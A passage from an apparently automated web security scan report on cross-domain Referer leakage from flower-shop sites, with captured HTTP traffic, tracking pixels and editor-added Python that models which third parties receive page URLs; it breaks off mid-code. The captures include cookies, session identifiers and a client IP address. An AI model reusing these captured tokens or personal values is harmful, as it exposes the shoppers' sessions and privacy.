Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1; FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 542
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 01:00:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body><IMG id="fd_pct_image0" name="fd_pct_image0" src="http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Product" width=1 height=1 alt="">
<IMG id="fd_pct_image1" name="fd_pct_image1" src="http://pix04.revsci.net/K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145" width=1 height=1 alt="">
</body>
...[SNIP]...

16.6. http://adsfac.us/pct_mx.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Issue detail

The page was loaded from a URL containing a query string: http://adsfac.us/pct_mx.asp?L=305609&source=if. The response contains a link to another domain: the pix04.revsci.net tracking image in the response below, which receives this URL as the Referer when the browser loads it.

Request

GET /pct_mx.asp?L=305609&source=if HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1; FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 393
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 01:01:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body><IMG id="fd_pct_image0" name="fd_pct_image0" src="http://pix04.revsci.net/K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145" width=1 height=1 alt="">
</body>
...[SNIP]...

16.7. http://adsfac.us/pct_mx.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Issue detail

The page was loaded from a URL containing a query string: http://adsfac.us/pct_mx.asp?L=305606&source=if. The response contains links to other domains: the nine tracking pixels below, on ad.trafficmp.com, bp.specificclick.net, leadback.advertising.com, pixel.quantserve.com, at.amgdgt.com, view.atdmt.com, ads.bluelithium.com, att.adpxpx.com and pix04.revsci.net, each of which receives this URL as the Referer when the browser loads it.

Request

GET /pct_mx.asp?L=305606&source=if HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1; FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1475
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 00:59:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body><IMG id="fd_pct_image0" name="fd_pct_image0" src="http://ad.trafficmp.com/a/bpix?adv=1657&id=1&r=" width=1 height=1 alt="">
<IMG id="fd_pct_image1" name="fd_pct_image1" src="http://bp.specificclick.net?pixid=99016158" width=1 height=1 alt="">
<IMG id="fd_pct_image2" name="fd_pct_image2" src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=birthdaysmiles_cs=1&betq=12580=431215" width=1 height=1 alt="">
<IMG id="fd_pct_image3" name="fd_pct_image3" src="http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Welcome" width=1 height=1 alt="">
<IMG id="fd_pct_image4" name="fd_pct_image4" src="http://at.amgdgt.com/ads/?t=pp&px=13078&rnd=[cachebuster]" width=1 height=1 alt="">
<IMG id="fd_pct_image5" name="fd_pct_image5" src="http://view.atdmt.com/action/MMN_1800Flowers_Welcome" width=1 height=1 alt="">
<IMG id="fd_pct_image6" name="fd_pct_image6" src="http://ads.bluelithium.com/pixel?id=1079972&t=2" width=1 height=1 alt="">
<IMG id="fd_pct_image7" name="fd_pct_image7" src="http://att.adpxpx.com/pixel.php?id=181" width=1 height=1 alt="">
<IMG id="fd_pct_image8" name="fd_pct_image8" src="http://pix04.revsci.net/K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fwelcome&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145" width=1 height=1 alt="">
</body>
...[SNIP]...

16.8. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string: http://bp.specificclick.net/?pixid=99016158. The response is a 302 whose Location header, and the body link that duplicates it, point to another domain, www.googleadservices.com. Browsers preserve the original Referer across a redirect, so what reaches googleadservices is this request's own Referer, http://adsfac.us/pct_mx.asp?L=305606&source=if, which is in turn the tracking page embedded from ww30.1800flowers.com (finding 16.7).

Request

GET /?pixid=99016158 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7hMF^3^15; smdmp=7hMF:1012201040^7hMF:104201101^7hMF:811200901^7e-J:811200901; adf=7hMF^0^0; ug=wJ6hSWn821G3dA

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=7rMsCIfRlAIQt6DI6wM&amp;guid=ON&amp;script=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 270
Date: Mon, 09 May 2011 01:01:04 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.googleadservices.com/pagead/conversion/1030885431/?label=7rMsCIfRlAIQt6DI6wM&amp;amp;guid=ON&amp;amp;script=0">here</a>
...[SNIP]...

16.9. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string: http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=. The response contains a link to another domain: the script writes an iframe for https://fls.doubleclick.net/activityi;... into the document (see the response below). This response is a script included by www.ftd.com (see the Referer), and it also reads top.document.URL and top.document.referrer, so the embedding page's URL and its own referrer reach the third party through the DOM as well as through the Referer header.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u= HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CMEacUnu%2BdlVAnlb0EJqADUPwdEWLwFVt1YkusdXa%2FyG4PDMmwT%2Bp04eahs%2BgOi%2BCY9F8sJ1N5rP7C5Tcb6%2BH1tPYzqeBSrsgO%2FIVnhaSvpJm5%2FDT0Ajp8kznUSNzkVywo4QxpKsftt8R5jf0pDOjFkH3uJy8CgNSN5gRv3ZgKClRVzaPtdufl67Wm9PuOAAQRJYlAbyAfeEbfybOFvnJNK26bhsFqut4RfCugAAIH9Thyf7tC%2FaFjZR6%2F4Xe3KWE9CjAfOduuB6WLWUvJbSzsEWNZmsH81p0aGPaG8iWRByF0XMlYG51oqOMDXV2iLvcha3GW5DrzVhwxSGnknALfg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1213
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split(
...[SNIP]...
Of('sitrackingid') > 0){
}else{
if( si_pageurl.indexOf('sisearchengine') > 0){
}else{
};
};
}
DeliverThirdPartyPixels();
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<iframe src="https://fls.doubleclick.net/activityi;src=1667271;type=jan20557;cat=ftdse646;ord=' + a + '?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

16.10. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Issue detail

The page was loaded from a URL containing a query string: https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685. The response contains links to other domains: the a248.e.akamai.net stylesheet, script and image references and the https://cdn.mercent.com/js/tracker.js script below. Of note, the (S(...)) path segment is the ASP.NET cookieless session identifier; the Referer sent to those hosts carries the full path as well as the query string, so the order-process session token itself is disclosed to them, not only the campaign and product parameters.
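Findings 16.4 to 16.10 all report the same mechanism, so one added example follows for the group. It is editor-supplied illustration, not scanner output and not code from any of the sites scanned. The Python below models what a browser discloses for one captured exchange: every src/href in the body receives the page URL (path and query, never the fragment) as Referer; a 3xx Location is followed with the inbound Referer preserved, and a redirect body is not rendered; the https-to-http suppression is applied; and links are compared by registrable domain, approximated here as the last two DNS labels because no public-suffix list is consulted (an assumption of this example). The sample exchanges are constructed abbreviations of the captures in findings 16.4, 16.7 and 16.8, and the GIFTOPTIONS_URL constant is a shortened form of the 16.10 request URL.

```python
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def referer_for(url):
    """Referer a browser derives from a page URL: scheme, host, path and query
    all go to every resource the page loads; only the fragment is dropped."""
    return urlsplit(url)._replace(fragment="").geturl()


def has_query(url):
    return bool(urlsplit(url).query)


def site_of(url):
    """Registrable domain, approximated as the last two DNS labels
    (assumption: no public-suffix list is consulted in this example)."""
    host = (urlsplit(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])


class _LinkCollector(HTMLParser):
    # Every src/href value: what the scanner lists as "links to other domains".
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and value and not value.lower().startswith("javascript:"):
                self.urls.append(value)


@dataclass
class Leak:
    target: str       # third-party URL that receives a Referer
    target_host: str
    referer: str      # the Referer value that reaches it
    via: str          # "body" (src/href) or "redirect" (Location header)


def find_referer_leaks(request_url, response_headers, response_body, inbound_referer=None):
    """What one captured exchange discloses to other sites. Body links are fetched
    with this page's URL as Referer. A Location header is followed with the Referer
    of the request that led here (browsers preserve it across redirects); a redirect
    body is never rendered, so its links are ignored. No Referer is sent from an https
    page to an http resource (RFC 2616 s15.1.3; browser default when this was scanned)."""
    candidates = []
    location = response_headers.get("Location")
    if location:
        if inbound_referer:
            candidates.append((urljoin(request_url, location), referer_for(inbound_referer), "redirect"))
    else:
        collector = _LinkCollector()
        collector.feed(response_body)
        candidates = [(urljoin(request_url, u), referer_for(request_url), "body") for u in collector.urls]

    leaks = []
    for target, referer, via in candidates:
        if site_of(target) == site_of(referer):
            continue  # same site: not a cross-domain disclosure
        if urlsplit(referer).scheme == "https" and urlsplit(target).scheme == "http":
            continue  # secure-to-insecure: the browser suppresses the Referer
        leaks.append(Leak(target, urlsplit(target).hostname, referer, via))
    return leaks


ADSFAC_URL = "http://adsfac.us/pct_mx.asp?L=305606&source=if"
GIFTOPTIONS_URL = ("https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))"
                   "/GiftOptions.aspx?flexShown=False&pid=30050137&Ref=HomeNoRef")

# Constructed samples, abbreviated from the captures in findings 16.4, 16.7 and 16.8.
SAMPLES = {
    "16.4": dict(
        request_url="https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef",
        response_headers={},
        response_body='<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>'
                      '<script src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>'
                      '<a href="http://www.proflowers.com/Default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef">home</a>'
                      '<script src="https://cdn.mercent.com/js/tracker.js"></script>'),
    "16.7": dict(
        request_url=ADSFAC_URL,
        response_headers={},
        response_body='<html><body><IMG src="http://ad.trafficmp.com/a/bpix?adv=1657" width=1 height=1 alt="">'
                      '<IMG src="http://bp.specificclick.net?pixid=99016158" width=1 height=1 alt="">'
                      '<IMG src="http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Welcome" width=1 height=1 alt="">'
                      '</body></html>'),
    "16.8": dict(
        request_url="http://bp.specificclick.net/?pixid=99016158",
        response_headers={"Location": "http://www.googleadservices.com/pagead/conversion/1030885431/?label=7rMsCIfRlAIQt6DI6wM&guid=ON&script=0"},
        response_body='<html><body>This document has moved <a href="http://www.googleadservices.com/pagead/conversion/1030885431/">here</a></body></html>',
        inbound_referer=ADSFAC_URL),
}


def scan_samples():
    return {name: find_referer_leaks(**sample) for name, sample in SAMPLES.items()}


if __name__ == "__main__":
    for name, leaks in scan_samples().items():
        print(name, [(leak.via, leak.target_host, leak.referer) for leak in leaks])
    print("16.10 Referer:", referer_for(GIFTOPTIONS_URL))  # the (S(...)) path segment travels too
```

Running it reports two leaks for 16.4 (the https akamai script and cdn.mercent.com; the http favicon is suppressed and www.proflowers.com is the same site), three for the abbreviated 16.7 body, and a single redirect leak for 16.8 whose forwarded Referer is the adsfac.us URL rather than the specificclick one. The 16.10 line shows that the session segment in the path is part of what every third-party host on that page receives; the scanner's query-string condition is necessary for the finding but is not the only thing that leaks.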

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:31 GMT
Content-Length: 46815


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>

   <body id="ctl00_OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
" title="Go to Proflowers Homepage" href="http://www.proflowers.com/default.aspx?tile=hmpg_carousel&amp;ssid=27&amp;Ref=HomeNoRef&amp;COBRAND=pfc" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td><img id="ctl00_ProgessBar1_imagedatalist_ctl00_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step1_GiftOptions_Selected.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl01_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/CardMessageMiddle_Future.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl02_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_SignIn_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl03_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Delivery_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl04_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Billing_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl05_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_PlaceOrder_FutureStep.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="OPLeftColumn" valign="top" style="width:577px;">
                               
                               
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/giftoptionspage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td valign="middle" style="width:70px;">
<img id="ctl00_OrderProcessPageBody_ctl01_accSelectionList_productList_ctl00_ctl00__productImage" vspace="0" hspace="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" />
</td>
...[SNIP]...
<td valign="middle" style="width:70px;">
<img id="ctl00_OrderProcessPageBody_ctl01_accSelectionList_productList_ctl01_ctl00__productImage" vspace="0" hspace="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" />
</td>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="SelectedProductSummary_ProductImageContainer" style="margin-bottom:10px;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00__productImg" border="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" style="height:140px;width:120px;border-width:0px;" /><!--[.net]-->
...[SNIP]...
<td id="SelectedAccessory_image" style="height:60px; min-width:0;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00_selectedAccessories_productList_ctl00_ctl00__productImage" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" /> </td>
...[SNIP]...
gn.com/splash?form_file=fdf/splash.fdf&dn=ORDERS.PROFLOWERS.COM&lang=en','Verisign','width=560,height=500,directories=no,location=yes,menubar=no,scrollbars=yes,status=yes,toolbar=no,resizable=yes');" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/VeriSignSecurity.gif" style="border: 0px;"/></a>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...

16.11. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:
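The check behind this informational finding, written out as an added example (it is not code from the report or from the scanner that produced it): given the request URL and the response body, list every reference in the body that points to a host other than the page's own. Each of those hosts receives the page URL, including its query string, as the Referer when the browser fetches the resource or follows the link. The sample URL and HTML below are constructed, loosely modelled on the request and response excerpts that follow; the function and variable names are my own.

```python
"""Cross-domain Referer leakage check (added example, not part of the scan report)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Tag/attribute pairs that make the browser fetch a sub-resource or navigate.
# Both kinds of request carry the current page URL as Referer unless a
# Referrer-Policy says otherwise.
URL_ATTRS = {
    "script": ("src",),
    "link": ("href",),
    "img": ("src",),
    "iframe": ("src",),
    "a": ("href",),
    "form": ("action",),
}


class _RefCollector(HTMLParser):
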